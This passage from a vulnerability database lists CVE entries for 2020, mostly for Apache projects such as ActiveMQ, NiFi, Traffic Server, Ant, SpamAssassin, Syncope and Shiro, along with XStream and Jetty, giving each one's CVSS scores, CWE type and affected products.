In Apache ActiveMQ 5.0.0 to 5.15.11, the webconsole admin GUI is open to XSS, in the view that lists the contents of a queue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
oracle communications_session_route_manager 8.1.1
oracle enterprise_repository 11.1.1.7.0
apache activemq *
oracle communications_session_report_manager 8.1.1
oracle communications_diameter_signaling_router *
oracle communications_element_manager 8.2.0
oracle communications_session_report_manager 8.2.1
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
oracle communications_element_manager 8.2.1
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
CVE-2020-1942 MEDIUM

In Apache NiFi 0.0.1 to 1.11.0, the flow fingerprint factory generated flow fingerprints which included sensitive property descriptor values. In the event a node attempted to join a cluster and the cluster flow was not inheritable, the flow fingerprint of both the cluster and local flow was printed, potentially containing sensitive values in plaintext.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-1943 MEDIUM

Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2020-1944 HIGH

There is a vulnerability in Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.8, and 8.0.0 to 8.0.5 with a smuggling attack and Transfer-Encoding and Content length headers. Upgrade to versions 7.1.9 and 8.0.6 or later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2020-1945 LOW

Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.3 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.0 5.2

CVSS 2.0

Severity: LOW

Problem Type: CWE-668,

Products Affected

Vendor Product Version
oracle retail_financial_integration 16.0.3.0
oracle retail_financial_integration 16.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_financial_integration 15.0.4.0
oracle retail_store_inventory_management 14.1.3
oracle enterprise_manager_ops_center 12.4.0.0
oracle retail_bulk_data_integration 19.0.1
oracle utilities_framework 4.4.0.0.0
oracle retail_bulk_data_integration 16.0.3.0
oracle retail_central_office 14.1
oracle retail_predictive_application_server 16.0.3
oracle primavera_unifier *
oracle retail_xstore_point_of_service 18.0.3
oracle retail_xstore_point_of_service 16.0.6
oracle retail_merchandising_system 19.0.1
oracle retail_replenishment_optimization 15.0.3
oracle retail_returns_management 14.1
oracle retail_assortment_planning 16.0.3
oracle retail_back_office 14.0
oracle primavera_unifier 16.1
oracle retail_assortment_planning 15.0.3
oracle banking_enterprise_collections *
oracle retail_extract_transform_and_load 13.2.8
oracle retail_predictive_application_server 16.0.3.0
oracle retail_central_office 14.0
oracle retail_xstore_point_of_service 15.0.4
oracle utilities_framework 2.2.0.0.0
oracle utilities_framework 4.2.0.2.0
oracle communications_order_and_service_management 7.3
oracle retail_store_inventory_management 14.1
oracle endeca_information_discovery_studio 3.2.0
oracle retail_service_backbone 16.0
oracle retail_merchandise_financial_planning 15.0.3
oracle retail_back_office 14.1
oracle retail_data_extractor_for_merchandising 1.9
oracle retail_regular_price_optimization 16.0.3
canonical ubuntu_linux 19.10
oracle retail_store_inventory_management 15.0.3
oracle retail_integration_bus 16.0
oracle retail_integration_bus 16.0.3.0
oracle communications_metasolv_solution 6.3.0
oracle banking_liquidity_management *
oracle timesten_in-memory_database *
oracle retail_data_extractor_for_merchandising 1.10
oracle communications_order_and_service_management 7.4
oracle retail_item_planning 15.0.3
oracle retail_integration_bus 14.1.3.2
oracle communications_diameter_signaling_router *
oracle real-time_decision_server 3.2.1.0
oracle primavera_unifier 16.2
oracle retail_predictive_application_server 14.1.3
oracle retail_size_profile_optimization 15.0.3
oracle retail_point-of-service 16.0
oracle flexcube_private_banking 12.0.0
oracle retail_store_inventory_management 16.0.3
oracle retail_extract_transform_and_load 13.2.5
oracle retail_predictive_application_server 15.0.3
oracle health_sciences_information_manager *
oracle retail_point-of-service 15.0
oracle retail_store_inventory_management 14.0.4
oracle retail_integration_bus 15.0.4.0
oracle retail_financial_integration 15.0
fedoraproject fedora 31
oracle rapid_planning 12.2
oracle retail_service_backbone 19.0.1.0
oracle retail_returns_management 14.0
oracle business_process_management_suite 12.2.1.3.0
oracle retail_regular_price_optimization 15.0.3
oracle retail_bulk_data_integration 16.0
oracle retail_bulk_data_integration 15.0
oracle data_integrator 12.2.1.4.0
oracle flexcube_investor_servicing 12.3.0
oracle primavera_gateway *
oracle flexcube_investor_servicing 12.4.0
oracle retail_store_inventory_management 16.0
oracle utilities_framework 4.2.0.3.0
oracle timesten_in-memory_database 11.2.2.8.49
oracle retail_integration_bus 19.0.1.0
oracle retail_predictive_application_server 14.0.3
oracle retail_advanced_inventory_planning 14.1
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle retail_point-of-service 14.0
oracle communications_asap 7.3
oracle flexcube_investor_servicing 14.1.0
oracle primavera_unifier 19.12
oracle retail_advanced_inventory_planning 16.0
oracle retail_advanced_inventory_planning 15.0
oracle flexcube_investor_servicing 14.0.0
oracle flexcube_private_banking 12.1.0
oracle utilities_framework 4.4.0.2.0
oracle retail_financial_integration 14.1.3.2
oracle enterprise_repository 11.1.1.7.0
oracle financial_services_analytical_applications_infrastructure *
apache ant *
oracle retail_service_backbone 16.0.3.0
fedoraproject fedora 32
oracle retail_service_backbone 15.0
oracle utilities_framework *
oracle rapid_planning 12.1
oracle retail_store_inventory_management 15.0
oracle retail_service_backbone 15.0.4.0
opensuse leap 15.2
oracle banking_platform *
oracle retail_integration_bus 14.1
oracle retail_xstore_point_of_service 19.0.2
oracle flexcube_investor_servicing 12.1.0
oracle business_process_management_suite 12.2.1.4.0
oracle retail_integration_bus 15.0
oracle retail_point-of-service 14.1
oracle retail_service_backbone 14.1.3.2
oracle data_integrator 12.2.1.3.0
oracle category_management_planning_&_optimization 15.0.3
oracle retail_macro_space_optimization 15.0.3
oracle retail_size_profile_optimization 16.0.3
CVE-2020-1946 HIGH

In Apache SpamAssassin before 3.4.5, malicious rule configuration (.cf) files can be configured to run system commands without any output or errors. With this, exploits can be injected in a number of scenarios. In addition to upgrading to SA version 3.4.5, users should only use update channels or 3rd party .cf files from trusted places.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,CWE-78,

Products Affected

Vendor Product Version
fedoraproject fedora 32
apache spamassassin *
fedoraproject fedora 34
debian debian_linux 9.0
debian debian_linux 10.0
fedoraproject fedora 33
CVE-2020-1947 HIGH

In Apache ShardingSphere(incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere's web console uses the SnakeYAML library for parsing YAML inputs to load datasource configuration. SnakeYAML allows to unmarshal data to a Java type By using the YAML tag. Unmarshalling untrusted data can lead to security flaws of RCE.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache shardingsphere 4.0.0
CVE-2020-1948 HIGH

This vulnerability can affect all Dubbo users stay on version 2.7.6 or lower. An attacker can send RPC requests with unrecognized service name or method name along with some malicious parameter payloads. When the malicious parameter is deserialized, it will execute some malicious code. More details can be found below.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2020-1949 MEDIUM

Scripts in Sling CMS before 0.16.0 do not property escape the Sling Selector from URLs when generating navigational elements for the administrative consoles and are vulnerable to reflected XSS attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling_cms *
CVE-2020-1950 MEDIUM

A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser in versions 1.0-1.23.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
canonical ubuntu_linux 16.04
apache tika *
oracle communications_messaging_server 8.1
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle communications_messaging_server 8.0.2
debian debian_linux 8.0
oracle business_process_management_suite 12.2.1.4.0
CVE-2020-1951 MEDIUM

A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
canonical ubuntu_linux 16.04
apache tika *
oracle communications_messaging_server 8.1
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle communications_messaging_server 8.0.2
debian debian_linux 8.0
oracle business_process_management_suite 12.2.1.4.0
CVE-2020-1952 HIGH

An issue was found in Apache IoTDB .9.0 to 0.9.1 and 0.8.0 to 0.8.2. When starting IoTDB, the JMX port 31999 is exposed with no certification.Then, clients could execute code remotely.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache iotdb *
CVE-2020-1953 HIGH

Apache Commons Configuration uses a third-party library to parse YAML files which by default allows the instantiation of classes if the YAML includes special statements. Apache Commons Configuration versions 2.2, 2.3, 2.4, 2.5, 2.6 did not change the default settings of this library. So if a YAML file was loaded from an untrusted source, it could therefore load and execute code out of the control of the host application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 3.9 6.0

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle database_server 19c
oracle healthcare_foundation 7.1.1
oracle database_server 12.1.0.2
apache commons_configuration 2.5
oracle database_server 11.2.0.4
oracle healthcare_foundation 7.3.0
apache commons_configuration 2.2
apache commons_configuration 2.6
oracle healthcare_foundation 7.2.1
oracle database_server 18c
oracle healthcare_foundation 7.2.0
apache commons_configuration 2.3
apache commons_configuration 2.4
oracle database_server 12.2.0.1
CVE-2020-1954 LOW

Apache CXF has the ability to integrate with JMX by registering an InstrumentationManager extension with the CXF bus. If the ‘createMBServerConnectorFactory‘ property of the default InstrumentationManagerImpl is not disabled, then it is vulnerable to a man-in-the-middle (MITM) style attack. An attacker on the same host can connect to the registry and rebind the entry to another server, thus acting as a proxy to the original. They are then able to gain access to all of the information that is sent and received over JMX.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 1.6 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle peoplesoft_enterprise_peopletools 8.56
oracle communications_session_route_manager *
oracle communications_diameter_signaling_router_idih: *
apache cxf *
oracle enterprise_manager_base_platform 13.2.1.0
oracle communications_diameter_signaling_router *
netapp snapmanager -
netapp oncommand_workflow_automation -
oracle communications_element_manager *
CVE-2020-1955 MEDIUM

CouchDB version 3.0.0 shipped with a new configuration setting that governs access control to the entire database server called `require_valid_user_except_for_up`. It was meant as an extension to the long standing setting `require_valid_user`, which in turn requires that any and all requests to CouchDB will have to be made with valid credentials, effectively forbidding any anonymous requests. The new `require_valid_user_except_for_up` is an off-by-default setting that was meant to allow requiring valid credentials for all endpoints except for the `/_up` endpoint. However, the implementation of this made an error that lead to not enforcing credentials on any endpoint, when enabled. CouchDB versions 3.0.1[1] and 3.1.0[2] fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache couchdb 3.0.0
CVE-2020-1956 HIGH

Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,CWE-78,

Products Affected

Vendor Product Version
apache kylin 3.0.0
apache kylin 2.4.0
apache kylin 2.4.1
apache kylin *
apache kylin 3.0.1
CVE-2020-1957 HIGH

Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache shiro *
debian debian_linux 8.0
CVE-2020-1958 LOW

When LDAP authentication is enabled in Apache Druid 0.17.0, callers of Druid APIs with a valid set of LDAP credentials can bypass the credentialsValidator.userSearch filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid. They are still subject to role-based authorization checks, if configured. Callers of Druid APIs can also retrieve any LDAP attribute values of users that exist on the LDAP server, so long as that information is visible to the Druid server. This information disclosure does not require the caller itself to be a valid LDAP user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache druid 0.17.0
CVE-2020-1959 HIGH

A Server-Side Template Injection was identified in Apache Syncope prior to 2.1.6 enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template being passed, they will be able to run arbitrary Java code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-917,

Products Affected

Vendor Product Version
apache syncope *
CVE-2020-1960 LOW

A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0) where, when running a process with an enabled JMXReporter, with a port configured via metrics.reporter.reporter_name>.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to rebind the JMXRMI registry to one under the attacker's control. This compromises any connection established to the process via JMX, allowing extraction of credentials and any other transferred data.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N 1.0 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache flink 1.10.0
apache flink *
CVE-2020-1961 HIGH

Vulnerability to Server-Side Template Injection on Mail templates for Apache Syncope 2.0.X releases prior to 2.0.15, 2.1.X releases prior to 2.1.6, enabling attackers to inject arbitrary JEXL expressions, leading to Remote Code Execution (RCE) was discovered.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache syncope *
CVE-2020-1963 MEDIUM

Apache Ignite uses H2 database to build SQL distributed execution engine. H2 provides SQL functions which could be used by attacker to access to a filesystem.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache ignite *
CVE-2020-1964 HIGH

It was noticed that Apache Heron 0.20.2-incubating, Release 0.20.1-incubating, and Release v-0.20.0-incubating does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerabilities (CWE-502: Deserialization of Untrusted Data).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache heron 0.20.1-incubating
apache heron 0.20.2-incubating
apache heron 0.20.0-incubating
CVE-2020-23922 MEDIUM

An issue was discovered in giflib through 5.1.4. DumpScreen2RGB in gif2rgb.c has a heap-based buffer over-read.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H 1.8 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
apache bookkeeper 4.12.1
giflib_project giflib *
CVE-2020-25649 MEDIUM

A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,CWE-611,

Products Affected

Vendor Product Version
oracle jd_edwards_enterpriseone_tools *
oracle jd_edwards_enterpriseone_orchestrator *
oracle communications_billing_and_revenue_management 7.5.0.23.0
oracle utilities_framework 4.4.0.0.0
oracle primavera_gateway *
oracle health_sciences_empirica_signal 9.0
oracle retail_xstore_point_of_service 20.0.1
oracle communications_interactive_session_recorder 6.3
oracle utilities_framework 4.3.0.5.0
oracle agile_plm 9.3.6
oracle blockchain_platform *
oracle retail_xstore_point_of_service 18.0.3
netapp oncommand_api_services -
oracle retail_xstore_point_of_service 16.0.6
oracle communications_offline_mediation_controller 12.0.0.3
oracle insurance_policy_administration *
oracle communications_services_gatekeeper 7.0
oracle agile_product_lifecycle_management_integration_pack 3.6
oracle coherence 14.1.1.0.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_cloud_native_core_unified_data_repository 1.4.0
oracle communications_convergent_charging_controller 12.0.4.0.0
oracle webcenter_portal 12.2.1.4.0
oracle banking_apis *
fasterxml jackson-databind *
oracle primavera_gateway 20.12.0
oracle commerce_platform 11.2.0
oracle communications_evolved_communications_application_server 7.1
apache iotdb *
oracle banking_apis 19.1
oracle banking_treasury_management 4.4
oracle communications_interactive_session_recorder 6.4
oracle banking_platform 2.9.0
oracle commerce_platform *
oracle banking_platform 2.6.2
oracle banking_platform 2.7.1
oracle utilities_framework 4.4.0.2.0
oracle banking_apis 20.1
oracle retail_service_backbone 15.0.3.1
oracle insurance_policy_administration 11.0.2
oracle banking_platform 2.7.0
oracle retail_service_backbone 16.0.3
oracle coherence 12.2.1.4.0
netapp service_level_manager -
oracle banking_apis 21.1
oracle insurance_rules_palette *
oracle communications_instant_messaging_server 10.0.1.5.0
quarkus quarkus *
oracle goldengate_application_adapters 19.1.0.0.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 32
oracle health_sciences_empirica_signal 9.1
oracle utilities_framework 4.3.0.6.0
oracle communications_billing_and_revenue_management 12.0.0.3.0
oracle utilities_framework 4.4.0.3.0
oracle sd-wan_edge 9.0
oracle retail_xstore_point_of_service 19.0.2
oracle communications_messaging_server 8.0.2
oracle banking_platform 2.8.0
oracle communications_network_charging_and_control 12.0.4.0.0
oracle banking_apis 19.2
oracle banking_platform 2.10.0
oracle retail_service_backbone 14.1.3.2
oracle communications_pricing_design_center 12.0.0.4.0
oracle communications_messaging_server 8.1
netapp oncommand_workflow_automation -
oracle insurance_rules_palette 11.0.2
CVE-2020-26217 HIGH

XStream before version 1.4.14 is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected. Anyone using XStream's Security Framework allowlist is not affected. The linked advisory provides code workarounds for users who cannot upgrade. The issue is fixed in version 1.4.14.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 8.0 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H 1.3 6.0
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,CWE-78,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle banking_corporate_lending_process_management 14.5
oracle banking_cash_management 14.3
netapp snapmanager *
oracle banking_corporate_lending_process_management 14.3
oracle banking_virtual_account_management 14.2.0
debian debian_linux 10.0
oracle endeca_information_discovery_studio 3.2.0.0
oracle banking_cash_management 14.5
xstream_project xstream *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
netapp snapmanager -
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle banking_trade_finance_process_management 14.3
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
debian debian_linux 9.0
oracle banking_credit_facilities_process_management 14.5
oracle banking_trade_finance_process_management 14.5
oracle retail_xstore_point_of_service 17.0.4
apache activemq 5.16.0
oracle banking_corporate_lending_process_management 14.2
oracle business_activity_monitoring 12.2.1.3.0
oracle banking_trade_finance_process_management 14.2
oracle retail_xstore_point_of_service 19.0.2
oracle banking_credit_facilities_process_management 14.2
oracle banking_supply_chain_finance 14.3
apache activemq 5.15.4
oracle banking_platform 2.9.0
oracle banking_cash_management 14.2
oracle banking_supply_chain_finance 14.2
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_supply_chain_finance 14.5
oracle banking_platform 2.7.1
oracle banking_credit_facilities_process_management 14.3
CVE-2020-26258 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, a Server-Side Forgery Request vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist if running Java 15 or higher. No user is affected who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 7.7 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N 3.1 4.0
nvd@nist.gov 7.7 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N 3.1 4.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-918,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache struts *
xstream_project xstream *
fedoraproject fedora 34
debian debian_linux 9.0
debian debian_linux 10.0
fedoraproject fedora 33
CVE-2020-26259 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling. The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing process has sufficient rights only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist running Java 15 or higher. No user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N 2.2 4.0
security-advisories@github.com 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N 2.2 4.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,CWE-78,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache struts *
xstream_project xstream *
fedoraproject fedora 34
debian debian_linux 9.0
debian debian_linux 10.0
fedoraproject fedora 33
CVE-2020-27216 MEDIUM

In Eclipse Jetty versions 1.0 thru 9.4.32.v20200930, 10.0.0.alpha1 thru 10.0.0.beta2, and 11.0.0.alpha1 thru 11.0.0.beta2O, on Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-378,CWE-379,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle jd_edwards_enterpriseone_tools *
debian debian_linux 10.0
eclipse jetty 11.0.0
eclipse jetty 10.0.0
eclipse jetty *
netapp vasa_provider *
apache beam 2.23.0
apache beam 2.24.0
oracle communications_pricing_design_center 12.0.0.3.0
apache beam 2.25.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_core_banking *
oracle communications_element_manager *
netapp snap_creator_framework -
oracle communications_services_gatekeeper 7.0
debian debian_linux 9.0
netapp snapcenter -
oracle communications_application_session_controller 3.9m0p2
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle siebel_core_-_automation *
apache beam 2.21.0
netapp storage_replication_adapter *
oracle flexcube_private_banking 12.1.0
apache beam 2.22.0
netapp virtual_storage_console *
oracle communications_converged_application_server_-_service_controller 6.2
CVE-2020-27218 MEDIUM

In Eclipse Jetty version 9.4.0.RC0 to 9.4.34.v20201102, 10.0.0.alpha0 to 10.0.0.beta2, and 11.0.0.alpha0 to 11.0.0.beta2, if GZIP request body inflation is enabled and requests from different clients are multiplexed onto a single connection, and if an attacker can send a request with a body that is received entirely but not consumed by the application, then a subsequent request on the same connection will see that body prepended to its body. The attacker will not see any data but may inject data into the body of the subsequent request.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L 2.2 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-226,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
oracle communications_session_route_manager *
apache spark 2.4.8
oracle communications_services_gatekeeper 7.0
oracle rest_data_services *
apache kafka 2.7.0
debian debian_linux 10.0
oracle retail_eftlink 20.0.0
eclipse jetty 11.0.0
